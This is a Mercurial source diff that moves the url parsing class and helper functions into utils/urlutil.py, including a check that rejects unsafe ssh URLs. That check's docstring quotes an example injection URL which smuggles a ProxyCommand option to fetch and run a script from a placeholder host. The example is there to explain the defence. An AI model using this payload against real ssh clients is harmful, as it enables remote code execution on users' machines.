--- a/mercurial/utils/urlutil.py Sun Apr 11 23:54:35 2021 +0200
+++ b/mercurial/utils/urlutil.py Mon Apr 12 03:01:04 2021 +0200
@@ -5,6 +5,8 @@
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import os
+import re as remod
+import socket
from ..i18n import _
from ..pycompat import (
@@ -12,12 +14,437 @@
setattr,
)
from .. import (
+ encoding,
error,
pycompat,
- util,
+ urllibcompat,
)
+if pycompat.TYPE_CHECKING:
+ from typing import (
+ Union,
+ )
+
+urlreq = urllibcompat.urlreq
+
+
+def getport(port):
+ # type: (Union[bytes, int]) -> int
+ """Return the port for a given network service.
+
+ If port is an integer, it's returned as is. If it's a string, it's
+ looked up using socket.getservbyname(). If there's no matching
+ service, error.Abort is raised.
+ """
+ try:
+ return int(port)
+ except ValueError:
+ pass
+
+ try:
+ return socket.getservbyname(pycompat.sysstr(port))
+ except socket.error:
+ raise error.Abort(
+ _(b"no port number associated with service '%s'") % port
+ )
+
+
+class url(object):
+ r"""Reliable URL parser.
+
+ This parses URLs and provides attributes for the following
+ components:
+
+ <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
+
+ Missing components are set to None. The only exception is
+ fragment, which is set to '' if present but empty.
+
+ If parsefragment is False, fragment is included in query. If
+ parsequery is False, query is included in path. If both are
+ False, both fragment and query are included in path.
+
+ See http://www.ietf.org/rfc/rfc2396.txt for more information.
+
+ Note that for backward compatibility reasons, bundle URLs do not
+ take host names. That means 'bundle://../' has a path of '../'.
+
+ Examples:
+
+ >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
+ <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
+ >>> url(b'ssh://[::1]:2200//home/joe/repo')
+ <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
+ >>> url(b'file:///home/joe/repo')
+ <url scheme: 'file', path: '/home/joe/repo'>
+ >>> url(b'file:///c:/temp/foo/')
+ <url scheme: 'file', path: 'c:/temp/foo/'>
+ >>> url(b'bundle:foo')
+ <url scheme: 'bundle', path: 'foo'>
+ >>> url(b'bundle://../foo')
+ <url scheme: 'bundle', path: '../foo'>
+ >>> url(br'c:\foo\bar')
+ <url path: 'c:\\foo\\bar'>
+ >>> url(br'\\blah\blah\blah')
+ <url path: '\\\\blah\\blah\\blah'>
+ >>> url(br'\\blah\blah\blah#baz')
+ <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
+ >>> url(br'file:///C:\users\me')
+ <url scheme: 'file', path: 'C:\\users\\me'>
+
+ Authentication credentials:
+
+ >>> url(b'ssh://joe:xyz@x/repo')
+ <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
+ >>> url(b'ssh://joe@x/repo')
+ <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
+
+ Query strings and fragments:
+
+ >>> url(b'http://host/a?b#c')
+ <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
+ >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
+ <url scheme: 'http', host: 'host', path: 'a?b#c'>
+
+ Empty path:
+
+ >>> url(b'')
+ <url path: ''>
+ >>> url(b'#a')
+ <url path: '', fragment: 'a'>
+ >>> url(b'http://host/')
+ <url scheme: 'http', host: 'host', path: ''>
+ >>> url(b'http://host/#a')
+ <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
+
+ Only scheme:
+
+ >>> url(b'http:')
+ <url scheme: 'http'>
+ """
+
+ _safechars = b"!~*'()+"
+ _safepchars = b"/!~*'()+:\\"
+ _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
+
+ def __init__(self, path, parsequery=True, parsefragment=True):
+ # type: (bytes, bool, bool) -> None
+ # We slowly chomp away at path until we have only the path left
+ self.scheme = self.user = self.passwd = self.host = None
+ self.port = self.path = self.query = self.fragment = None
+ self._localpath = True
+ self._hostport = b''
+ self._origpath = path
+
+ if parsefragment and b'#' in path:
+ path, self.fragment = path.split(b'#', 1)
+
+ # special case for Windows drive letters and UNC paths
+ if hasdriveletter(path) or path.startswith(b'\\\\'):
+ self.path = path
+ return
+
+ # For compatibility reasons, we can't handle bundle paths as
+ # normal URLS
+ if path.startswith(b'bundle:'):
+ self.scheme = b'bundle'
+ path = path[7:]
+ if path.startswith(b'//'):
+ path = path[2:]
+ self.path = path
+ return
+
+ if self._matchscheme(path):
+ parts = path.split(b':', 1)
+ if parts[0]:
+ self.scheme, path = parts
+ self._localpath = False
+
+ if not path:
+ path = None
+ if self._localpath:
+ self.path = b''
+ return
+ else:
+ if self._localpath:
+ self.path = path
+ return
+
+ if parsequery and b'?' in path:
+ path, self.query = path.split(b'?', 1)
+ if not path:
+ path = None
+ if not self.query:
+ self.query = None
+
+ # // is required to specify a host/authority
+ if path and path.startswith(b'//'):
+ parts = path[2:].split(b'/', 1)
+ if len(parts) > 1:
+ self.host, path = parts
+ else:
+ self.host = parts[0]
+ path = None
+ if not self.host:
+ self.host = None
+ # path of file:///d is /d
+ # path of file:///d:/ is d:/, not /d:/
+ if path and not hasdriveletter(path):
+ path = b'/' + path
+
+ if self.host and b'@' in self.host:
+ self.user, self.host = self.host.rsplit(b'@', 1)
+ if b':' in self.user:
+ self.user, self.passwd = self.user.split(b':', 1)
+ if not self.host:
+ self.host = None
+
+ # Don't split on colons in IPv6 addresses without ports
+ if (
+ self.host
+ and b':' in self.host
+ and not (
+ self.host.startswith(b'[') and self.host.endswith(b']')
+ )
+ ):
+ self._hostport = self.host
+ self.host, self.port = self.host.rsplit(b':', 1)
+ if not self.host:
+ self.host = None
+
+ if (
+ self.host
+ and self.scheme == b'file'
+ and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
+ ):
+ raise error.Abort(
+ _(b'file:// URLs can only refer to localhost')
+ )
+
+ self.path = path
+
+ # leave the query string escaped
+ for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
+ v = getattr(self, a)
+ if v is not None:
+ setattr(self, a, urlreq.unquote(v))
+
+ def copy(self):
+ u = url(b'temporary useless value')
+ u.path = self.path
+ u.scheme = self.scheme
+ u.user = self.user
+ u.passwd = self.passwd
+ u.host = self.host
+ u.path = self.path
+ u.query = self.query
+ u.fragment = self.fragment
+ u._localpath = self._localpath
+ u._hostport = self._hostport
+ u._origpath = self._origpath
+ return u
+
+ @encoding.strmethod
+ def __repr__(self):
+ attrs = []
+ for a in (
+ b'scheme',
+ b'user',
+ b'passwd',
+ b'host',
+ b'port',
+ b'path',
+ b'query',
+ b'fragment',
+ ):
+ v = getattr(self, a)
+ if v is not None:
+ attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
+ return b'<url %s>' % b', '.join(attrs)
+
+ def __bytes__(self):
+ r"""Join the URL's components back into a URL string.
+
+ Examples:
+
+ >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
+ 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
+ >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
+ 'http://user:pw@host:80/?foo=bar&baz=42'
+ >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
+ 'http://user:pw@host:80/?foo=bar%3dbaz'
+ >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
+ 'ssh://user:pw@[::1]:2200//home/joe#'
+ >>> bytes(url(b'http://localhost:80//'))
+ 'http://localhost:80//'
+ >>> bytes(url(b'http://localhost:80/'))
+ 'http://localhost:80/'
+ >>> bytes(url(b'http://localhost:80'))
+ 'http://localhost:80/'
+ >>> bytes(url(b'bundle:foo'))
+ 'bundle:foo'
+ >>> bytes(url(b'bundle://../foo'))
+ 'bundle:../foo'
+ >>> bytes(url(b'path'))
+ 'path'
+ >>> bytes(url(b'file:///tmp/foo/bar'))
+ 'file:///tmp/foo/bar'
+ >>> bytes(url(b'file:///c:/tmp/foo/bar'))
+ 'file:///c:/tmp/foo/bar'
+ >>> print(url(br'bundle:foo\bar'))
+ bundle:foo\bar
+ >>> print(url(br'file:///D:\data\hg'))
+ file:///D:\data\hg
+ """
+ if self._localpath:
+ s = self.path
+ if self.scheme == b'bundle':
+ s = b'bundle:' + s
+ if self.fragment:
+ s += b'#' + self.fragment
+ return s
+
+ s = self.scheme + b':'
+ if self.user or self.passwd or self.host:
+ s += b'//'
+ elif self.scheme and (
+ not self.path
+ or self.path.startswith(b'/')
+ or hasdriveletter(self.path)
+ ):
+ s += b'//'
+ if hasdriveletter(self.path):
+ s += b'/'
+ if self.user:
+ s += urlreq.quote(self.user, safe=self._safechars)
+ if self.passwd:
+ s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
+ if self.user or self.passwd:
+ s += b'@'
+ if self.host:
+ if not (self.host.startswith(b'[') and self.host.endswith(b']')):
+ s += urlreq.quote(self.host)
+ else:
+ s += self.host
+ if self.port:
+ s += b':' + urlreq.quote(self.port)
+ if self.host:
+ s += b'/'
+ if self.path:
+ # TODO: similar to the query string, we should not unescape the
+ # path when we store it, the path might contain '%2f' = '/',
+ # which we should *not* escape.
+ s += urlreq.quote(self.path, safe=self._safepchars)
+ if self.query:
+ # we store the query in escaped form.
+ s += b'?' + self.query
+ if self.fragment is not None:
+ s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
+ return s
+
+ __str__ = encoding.strmethod(__bytes__)
+
+ def authinfo(self):
+ user, passwd = self.user, self.passwd
+ try:
+ self.user, self.passwd = None, None
+ s = bytes(self)
+ finally:
+ self.user, self.passwd = user, passwd
+ if not self.user:
+ return (s, None)
+ # authinfo[1] is passed to urllib2 password manager, and its
+ # URIs must not contain credentials. The host is passed in the
+ # URIs list because Python < 2.4.3 uses only that to search for
+ # a password.
+ return (s, (None, (s, self.host), self.user, self.passwd or b''))
+
+ def isabs(self):
+ if self.scheme and self.scheme != b'file':
+ return True # remote URL
+ if hasdriveletter(self.path):
+ return True # absolute for our purposes - can't be joined()
+ if self.path.startswith(br'\\'):
+ return True # Windows UNC path
+ if self.path.startswith(b'/'):
+ return True # POSIX-style
+ return False
+
+ def localpath(self):
+ # type: () -> bytes
+ if self.scheme == b'file' or self.scheme == b'bundle':
+ path = self.path or b'/'
+ # For Windows, we need to promote hosts containing drive
+ # letters to paths with drive letters.
+ if hasdriveletter(self._hostport):
+ path = self._hostport + b'/' + self.path
+ elif (
+ self.host is not None and self.path and not hasdriveletter(path)
+ ):
+ path = b'/' + path
+ return path
+ return self._origpath
+
+ def islocal(self):
+ '''whether localpath will return something that posixfile can open'''
+ return (
+ not self.scheme
+ or self.scheme == b'file'
+ or self.scheme == b'bundle'
+ )
+
+
+def hasscheme(path):
+ # type: (bytes) -> bool
+ return bool(url(path).scheme) # cast to help pytype
+
+
+def hasdriveletter(path):
+ # type: (bytes) -> bool
+ return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
+
+
+def urllocalpath(path):
+ # type: (bytes) -> bytes
+ return url(path, parsequery=False, parsefragment=False).localpath()
+
+
+def checksafessh(path):
+ # type: (bytes) -> None
+ """check if a path / url is a potentially unsafe ssh exploit (SEC)
+
+ This is a sanity check for ssh urls. ssh will parse the first item as
+ an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
+ Let's prevent these potentially exploited urls entirely and warn the
+ user.
+
+ Raises an error.Abort when the url is unsafe.
+ """
+ path = urlreq.unquote(path)
+ if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
+ raise error.Abort(
+ _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
+ )
+
+
+def hidepassword(u):
+ # type: (bytes) -> bytes
+ '''hide user credential in a url string'''
+ u = url(u)
+ if u.passwd:
+ u.passwd = b'***'
+ return bytes(u)
+
+
+def removeauth(u):
+ # type: (bytes) -> bytes
+ '''remove all authentication information from a url string'''
+ u = url(u)
+ u.user = u.passwd = None
+ return bytes(u)
+
+
class paths(dict):
"""Represents a collection of paths and their configs.
@@ -103,7 +530,7 @@
@pathsuboption(b'pushurl', b'pushloc')
def pushurlpathoption(ui, path, value):
- u = util.url(value)
+ u = url(value)
# Actually require a URL.
if not u.scheme:
ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name)
@@ -148,7 +575,7 @@
raise ValueError(b'rawloc must be defined')
# Locations may define branches via syntax <base>#<branch>.
- u = util.url(rawloc)
+ u = url(rawloc)
branch = None
if u.fragment:
branch = u.fragment